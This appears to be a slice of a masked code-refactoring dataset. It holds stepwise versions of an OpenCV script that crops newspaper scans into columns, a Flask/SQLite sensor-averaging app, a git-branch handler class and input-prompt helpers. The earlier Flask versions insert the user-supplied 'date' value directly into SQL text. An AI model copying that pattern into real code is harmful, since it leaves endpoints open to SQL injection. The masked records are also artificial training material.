in columnIndexPairs:\n xstart = max(columnIndexPair[0] - PADDING, 0)\n xend = min(columnIndexPair[1] + PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (\n basename, xstart, xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n print('writing out cropped image: ', filepath)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,\n LINE_THICKNESS)\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n return files\n\n\ndef invert_experiment():\n test_img = cv2.imread(\n './ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')\n for thresh in range(1, 200, 20):\n print('writing thresh= ' + str(thresh))\n _, temp_img = cv2.threshold(test_img, thresh, 255, cv2.\n THRESH_BINARY_INV)\n cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',\n temp_img)\n\n\ndef test(img, basename):\n test_img = convertToGrayscale(img)\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',\n test_img)\n \"\"\"\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n \"\"\"\n\n\n<mask token>\n",
"step-4": "<mask token>\nos.environ['OPENCV_IO_ENABLE_JASPER'] = 'True'\n<mask token>\nDILATE_KERNEL = np.array([[0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0,\n 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0,\n 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0,\n 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype\n =np.uint8)\n\n\ndef adaptative_thresholding(img, threshold):\n I = img\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n orignrows, origncols = gray.shape\n M = int(np.floor(orignrows / 16) + 1)\n N = int(np.floor(origncols / 16) + 1)\n Mextend = round(M / 2) - 1\n Nextend = round(N / 2) - 1\n aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=\n Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M, N), np.int32)\n imageIntegral = cv2.integral(aux, windows, -1)\n nrows, ncols = imageIntegral.shape\n result = np.zeros((orignrows, origncols))\n for i in range(nrows - M):\n for j in range(ncols - N):\n result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N\n ] + imageIntegral[i, j] - imageIntegral[i + M, j]\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n graymult = gray.astype('float64') * M * N\n binar[graymult <= result * (100.0 - threshold) / 100.0] = False\n binar = (255 * binar).astype(np.uint8)\n return binar\n\n\ndef Q_test(sorted_data):\n conf95_level = {(3): 0.97, (4): 0.829, (5): 0.71, (6): 0.625, (7): \n 0.568, (8): 0.526, (9): 0.493}\n q_exp = abs(sorted_data[1] - sorted_data[0]) / abs(sorted_data[-1] -\n sorted_data[0])\n print(str(abs(sorted_data[1] - sorted_data[0])) + ' / ' + str(abs(\n sorted_data[-1] - sorted_data[0])))\n print('q_exp : ' + str(q_exp))\n return q_exp > conf95_level[min(9, len(sorted_data))]\n\n\nCOLUMNS = 0\nGREEN = 0, 255, 0\nLINE_THICKNESS = 3\nPADDING = 10\nCREATE_COLUMN_OUTLINE_IMAGES = True\n\n\ndef columnIndexes(a):\n \"\"\"\n creates pair of indexes for left and right index of the 
image column\n For example [13, 1257, 2474, 3695, 4907, 6149]\n becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]\n \"\"\"\n nrows = a.size - 2 + 1\n return a[1 * np.arange(nrows)[:, None] + np.arange(2)]\n\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return temp_img\n\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print('invert image')\n _, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. \n \"\"\"\n print('applying dilation morph')\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)\n \"\"\"\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n \"\"\"\n return temp_img\n\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. 
The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n sums = np.sum(temp_img, axis=COLUMNS)\n sums[0] = 1000\n sums = sums * -4\n peaks, _ = find_peaks(sums, distance=600)\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n \"\"\"\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n \"\"\"\n print('PeakNum, Sum, QRemove for ' + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print('----------')\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\n 'ERROR: something went wrong with finding the peaks for image: '\n , os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg 0\\n')\n return files\n peaks[0] = 0\n peaks[-1] = sums.size - 1\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print('found image that is causing problems: ', os.path.join(\n directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks\n .size) + '\\n')\n columnIndexPairs = columnIndexes(peaks)\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0] - PADDING, 0)\n xend = min(columnIndexPair[1] + PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (\n basename, xstart, xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n print('writing out cropped image: ', filepath)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,\n LINE_THICKNESS)\n if 
CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n return files\n\n\ndef invert_experiment():\n test_img = cv2.imread(\n './ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')\n for thresh in range(1, 200, 20):\n print('writing thresh= ' + str(thresh))\n _, temp_img = cv2.threshold(test_img, thresh, 255, cv2.\n THRESH_BINARY_INV)\n cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',\n temp_img)\n\n\ndef test(img, basename):\n test_img = convertToGrayscale(img)\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',\n test_img)\n \"\"\"\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n \"\"\"\n\n\nif __name__ == '__main__':\n print('STARTING')\n for f in os.listdir('./ocr/data/gb19gw39h/'):\n if f.endswith('.jpg'):\n createColumnImages(cv2.imread(os.path.join(\n './ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0],\n './ocr/columns/gb19gw39h/')\n for f in os.listdir('./ocr/data/8k71pf94q/'):\n if f.endswith('.jpg'):\n createColumnImages(cv2.imread(os.path.join(\n './ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0],\n './ocr/columns/8k71pf94q/')\n for f in os.listdir('./ocr/data/mc87rq85m/'):\n if f.endswith('.jpg'):\n createColumnImages(cv2.imread(os.path.join(\n './ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0],\n './ocr/columns/mc87rq85m/')\n \"\"\"\n data_folder = './ocr/data/'\n for folder in os.listdir(data_folder):\n if folder == \".DS_Store\":\n continue\n for file in os.listdir(os.path.join(data_folder, folder)):\n if file.endswith(\".jpg\"):\n print(\"calling test() on \" + file)\n #test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])\n 
createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')\n \n for f in os.listdir('./ocr/data/8k71pr786/'):\n if f.endswith(\".jpg\"):\n for d in range(550, 850, 50):\n createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), '8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)\n #createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')\n \"\"\"\n",
"step-5": "\n# https://github.com/jscancella/NYTribuneOCRExperiments/blob/master/findText_usingSums.py\nimport os\nimport io\nfrom pathlib import Path\nimport sys\nos.environ['OPENCV_IO_ENABLE_JASPER']='True' # has to be set before importing cv2 otherwise it won't read the variable\nimport numpy as np\nimport cv2\n\nimport subprocess\nfrom multiprocessing import Pool\nfrom scipy.signal import find_peaks, find_peaks_cwt\n\nimport scipy.ndimage as ndimage\nfrom IPython.display import Image as KImage\n\n#custom kernel that is used to blend together text in the Y axis\nDILATE_KERNEL = np.array([\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype=np.uint8)\n\n\n# Run adaptative thresholding (is slow af compared to not using it in pipeline)\ndef adaptative_thresholding(img, threshold):\n # Load image\n I = img\n # Convert image to grayscale\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n # Original image size\n orignrows, origncols = gray.shape\n # Windows size\n M = int(np.floor(orignrows/16) + 1)\n N = int(np.floor(origncols/16) + 1)\n # Image border padding related to windows size\n Mextend = round(M/2)-1\n Nextend = round(N/2)-1\n # Padding image\n aux =cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=Nextend,\n right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M,N),np.int32)\n # Image integral calculation\n imageIntegral = cv2.integral(aux, windows,-1)\n # Integral image size\n nrows, ncols = imageIntegral.shape\n # Memory allocation for cumulative region image\n result = np.zeros((orignrows, origncols))\n # Image cumulative pixels in windows size calculation\n for i in range(nrows-M):\n for j in range(ncols-N):\n result[i, j] = imageIntegral[i+M, j+N] - imageIntegral[i, j+N]+ imageIntegral[i, j] - 
imageIntegral[i+M,j]\n\n # Output binary image memory allocation\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n # Gray image weighted by windows size\n graymult = (gray).astype('float64')*M*N\n # Output image binarization\n binar[graymult <= result*(100.0 - threshold)/100.0] = False\n # binary image to UINT8 conversion\n binar = (255*binar).astype(np.uint8)\n\n return binar\n\ndef Q_test(sorted_data):\n conf95_level = {3: .97, 4: .829, 5: .71, 6: .625, 7: .568, 8: .526, 9: .493}\n q_exp = abs(sorted_data[1] - sorted_data[0]) / abs(sorted_data[-1] - sorted_data[0])\n print(str(abs(sorted_data[1] - sorted_data[0])) + ' / ' + str(abs(sorted_data[-1] - sorted_data[0])))\n print(\"q_exp : \" + str(q_exp))\n return q_exp > conf95_level[min(9, len(sorted_data))]\n\n\n# static variables for clarity\nCOLUMNS = 0\nGREEN = (0, 255, 0)\n\n# parameters that can be tweaked\nLINE_THICKNESS = 3 # how thick to make the line around the found contours in the debug output\nPADDING = 10 # padding to add around the found possible column to help account for image skew and such\nCREATE_COLUMN_OUTLINE_IMAGES = True # if we detect that we didn't find all the columns. 
Create a debug image (tiff) showing the columns that were found\n\ndef columnIndexes(a):\n \"\"\"\n creates pair of indexes for left and right index of the image column\n For example [13, 1257, 2474, 3695, 4907, 6149]\n becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]\n \"\"\"\n nrows = (a.size-2)+1\n return a[1*np.arange(nrows)[:,None] + np.arange(2)]\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n return temp_img\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print(\"invert image\")\n # Should we edit these parameters?\n #3/18/21 - experimented on threshold, 140 is good.\n _,temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. \n \"\"\"\n print(\"applying dilation morph\")\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15) #the more iterations the more the text gets stretched in the Y axis, 15 seems about right.\n '''\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n '''\n return temp_img\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. 
The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n \n sums = np.sum(temp_img, axis = COLUMNS)\n \n sums[0] = 1000 # some random value so that find_peaks properly detects the peak for the left most column\n sums = sums * -4 # invert so that minimums become maximums and exagerate the data so it is more clear what the peaks are \n peaks, _ = find_peaks(sums, distance=600) # the column indexs of the img array, spaced at least 800 away from the previous peak\n\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n '''\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n '''\n print(\"PeakNum, Sum, QRemove for \" + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print(\"----------\")\n\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\"ERROR: something went wrong with finding the peaks for image: \", os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + \".jpg 0\\n\")\n return files\n\n peaks[0] = 0 # automatically make the left most column index the start of the image\n peaks[-1] =sums.size -1 # automatically make the right most column index the end of the image\n\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print(\"found image that is causing problems: \", os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + \".jpg \" + str(peaks.size) + \"\\n\")\n\n columnIndexPairs = columnIndexes(peaks)\n\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0]-PADDING, 0)\n xend = min(columnIndexPair[1]+PADDING, img.shape[1])\n if not os.path.exists(directory):\n 
os.makedirs(directory)\n filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (basename, xstart,xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n \n print(\"writing out cropped image: \", filepath)\n # Apply adaptative thresholding to the image with a threshold of 25/100\n #crop_img = adaptative_thresholding(crop_img, 25)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed,(xstart,ystart),(xend,yend), GREEN, LINE_THICKNESS)\n\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n # For removing the old image?\n # os.remove(os.path.join(directory, basename + \".jp2\"))\n\n return files\n\ndef invert_experiment():\n test_img = cv2.imread('./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')\n for thresh in range(1, 200, 20):\n print('writing thresh= ' + str(thresh))\n _,temp_img = cv2.threshold(test_img, thresh, 255, cv2.THRESH_BINARY_INV)\n cv2.imwrite('./ocr/test_images/thresh='+str(thresh)+'.jpg', temp_img)\n\n\n\ndef test(img, basename):\n #h, w, _ = img.shape\n #test_img = cv2.imread('./ocr/data/8k71pf94q/2_commonwealth_8k71pf94q_accessFull.jpg')\n test_img = convertToGrayscale(img)\n #ret,test_img = cv2.threshold(test_img,25,255,0)\n #cv2.imwrite('./ocr/test_images/contours/'+basename+'prepixelcrop.jpg', test_img)\n #test_img = test_img[10:h-10, 10: w-10]\n #y_nonzero, x_nonzero = np.nonzero(test_img)\n #test_img = test_img[np.min(y_nonzero):np.max(y_nonzero), np.min(x_nonzero):np.max(x_nonzero)]\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n\n #contours,hierarchy = cv2.findContours(test_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n #cnt = contours[0]\n #x,y,w,h = cv2.boundingRect(cnt)\n #test_img = cv2.rectangle(img,(10,10),(w-10, h-10), GREEN, LINE_THICKNESS)\n #test_img = cv2.drawContours(test_img, contours, 
-1, GREEN, LINE_THICKNESS)\n #crop = test_img[y:y+h,x:x+w]\n cv2.imwrite('./ocr/test_images/contours/'+basename+'dilated.jpg', test_img)\n '''\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n '''\n #cv2.imwrite('./ocr/test_images/inverted.jpg', test_img)\n\n \n\n\nif __name__ == \"__main__\":\n print(\"STARTING\")\n for f in os.listdir('./ocr/data/gb19gw39h/'):\n if f.endswith(\".jpg\"):\n #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])\n createColumnImages(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0], './ocr/columns/gb19gw39h/')\n\n for f in os.listdir('./ocr/data/8k71pf94q/'):\n if f.endswith(\".jpg\"):\n #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])\n createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0], './ocr/columns/8k71pf94q/')\n\n for f in os.listdir('./ocr/data/mc87rq85m/'):\n if f.endswith(\".jpg\"):\n #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])\n createColumnImages(cv2.imread(os.path.join('./ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0], './ocr/columns/mc87rq85m/')\n\n '''\n data_folder = './ocr/data/'\n for folder in os.listdir(data_folder):\n if folder == \".DS_Store\":\n continue\n for file in os.listdir(os.path.join(data_folder, folder)):\n if file.endswith(\".jpg\"):\n print(\"calling test() on \" + file)\n #test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])\n createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')\n \n for f in os.listdir('./ocr/data/8k71pr786/'):\n if f.endswith(\".jpg\"):\n for d in range(550, 850, 50):\n createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), 
'8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)\n #createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')\n '''\n\n",
"step-ids": [
6,
7,
8,
11,
13
]
}
|
[
6,
7,
8,
11,
13
] |
from flask import Flask, request
from flask import render_template
import sqlite3
import datetime
app = Flask(__name__)
@app.route('/')
def index(date = ""):
    """Render hourly average temperature/humidity for one day.

    The day is taken from the ``date`` query parameter (``DD.MM.YYYY``);
    when absent, it defaults to today.
    """
    date = request.args.get('date')
    if not date:
        now = datetime.datetime.now()
        date = "%02d.%02d.%04d" % (now.day, now.month, now.year)

    conn = sqlite3.connect("data.db")
    try:
        c = conn.cursor()
        # Parameterized query: the previous version interpolated the
        # user-supplied date straight into the SQL text (injection risk).
        # With a '?' placeholder the '%' signs no longer need doubling.
        res = c.execute(
            "SELECT STRFTIME('%H', date), AVG(temp), AVG(hum) FROM data "
            "WHERE STRFTIME('%d.%m.%Y', date)=? "
            "GROUP BY STRFTIME('%H', date) ", (date,))
        hour = list()
        temp = list()
        hum = list()
        for row in res:
            hour.append(row[0])
            temp.append("%.1f" % row[1])
            hum.append("%.1f" % row[2])
    finally:
        # The original leaked the connection on every request.
        conn.close()

    return render_template('index.html', date = date, hour = hour, temp = temp, hum = hum)
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    # NOTE(review): debug mode must not stay enabled in production.
    app.debug = True
    app.run(host = "127.0.0.1", port = 8888)
|
normal
|
{
"blob_id": "f6fe33e04ccdca1d9714caec412478d0cfc8b363",
"index": 5559,
"step-1": "<mask token>\n\n\n@app.route('/')\ndef index(date=''):\n date = request.args.get('date')\n if not date:\n now = datetime.datetime.now()\n date = '%02d.%02d.%04d' % (now.day, now.month, now.year)\n conn = sqlite3.connect('data.db')\n c = conn.cursor()\n res = c.execute(\n \"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' GROUP BY STRFTIME('%%H', date) \"\n % (date,))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append('%.1f' % row[1])\n hum.append('%.1f' % row[2])\n return render_template('index.html', date=date, hour=hour, temp=temp,\n hum=hum)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.route('/')\ndef index(date=''):\n date = request.args.get('date')\n if not date:\n now = datetime.datetime.now()\n date = '%02d.%02d.%04d' % (now.day, now.month, now.year)\n conn = sqlite3.connect('data.db')\n c = conn.cursor()\n res = c.execute(\n \"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' GROUP BY STRFTIME('%%H', date) \"\n % (date,))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append('%.1f' % row[1])\n hum.append('%.1f' % row[2])\n return render_template('index.html', date=date, hour=hour, temp=temp,\n hum=hum)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='127.0.0.1', port=8888)\n",
"step-3": "<mask token>\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index(date=''):\n date = request.args.get('date')\n if not date:\n now = datetime.datetime.now()\n date = '%02d.%02d.%04d' % (now.day, now.month, now.year)\n conn = sqlite3.connect('data.db')\n c = conn.cursor()\n res = c.execute(\n \"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' GROUP BY STRFTIME('%%H', date) \"\n % (date,))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append('%.1f' % row[1])\n hum.append('%.1f' % row[2])\n return render_template('index.html', date=date, hour=hour, temp=temp,\n hum=hum)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='127.0.0.1', port=8888)\n",
"step-4": "from flask import Flask, request\nfrom flask import render_template\nimport sqlite3\nimport datetime\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index(date=''):\n date = request.args.get('date')\n if not date:\n now = datetime.datetime.now()\n date = '%02d.%02d.%04d' % (now.day, now.month, now.year)\n conn = sqlite3.connect('data.db')\n c = conn.cursor()\n res = c.execute(\n \"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' GROUP BY STRFTIME('%%H', date) \"\n % (date,))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append('%.1f' % row[1])\n hum.append('%.1f' % row[2])\n return render_template('index.html', date=date, hour=hour, temp=temp,\n hum=hum)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='127.0.0.1', port=8888)\n",
"step-5": "from flask import Flask, request\n\nfrom flask import render_template\nimport sqlite3\nimport datetime\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index(date = \"\"):\n date = request.args.get('date')\n\n if not date:\n now = datetime.datetime.now()\n date = \"%02d.%02d.%04d\" % (now.day, now.month, now.year)\n\n conn = sqlite3.connect(\"data.db\")\n c = conn.cursor()\n res = c.execute(\"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data \"\n \"WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' \"\n \"GROUP BY STRFTIME('%%H', date) \" % (date, ))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append(\"%.1f\" % row[1])\n hum.append(\"%.1f\" % row[2])\n\n return render_template('index.html', date = date, hour = hour, temp = temp, hum = hum)\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host = \"127.0.0.1\", port = 8888)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Develop(Branch):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Develop(Branch):
def process(self):
if self.action is Actions.INIT:
self.start_message('Develop Init')
Init(self.state_handler, self.config_handler).process()
else:
raise NotImplementedError
<|reserved_special_token_1|>
from __future__ import annotations
from VersionControl.Branch import Branch
from Branches.Actions.Actions import Actions
from VersionControl.Git.Branches.Develop.Init import Init
class Develop(Branch):
    """Branch handler for the ``develop`` branch; supports only INIT."""

    def process(self):
        """Dispatch the requested action, rejecting anything but INIT."""
        if self.action is not Actions.INIT:
            raise NotImplementedError
        self.start_message('Develop Init')
        Init(self.state_handler, self.config_handler).process()
|
flexible
|
{
"blob_id": "338bf2406c233d857e1a688391161d58e1dab23c",
"index": 8910,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Develop(Branch):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Develop(Branch):\n\n def process(self):\n if self.action is Actions.INIT:\n self.start_message('Develop Init')\n Init(self.state_handler, self.config_handler).process()\n else:\n raise NotImplementedError\n",
"step-4": "from __future__ import annotations\nfrom VersionControl.Branch import Branch\nfrom Branches.Actions.Actions import Actions\nfrom VersionControl.Git.Branches.Develop.Init import Init\n\n\nclass Develop(Branch):\n\n def process(self):\n if self.action is Actions.INIT:\n self.start_message('Develop Init')\n Init(self.state_handler, self.config_handler).process()\n else:\n raise NotImplementedError\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
<|reserved_special_token_0|>
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
<|reserved_special_token_0|>
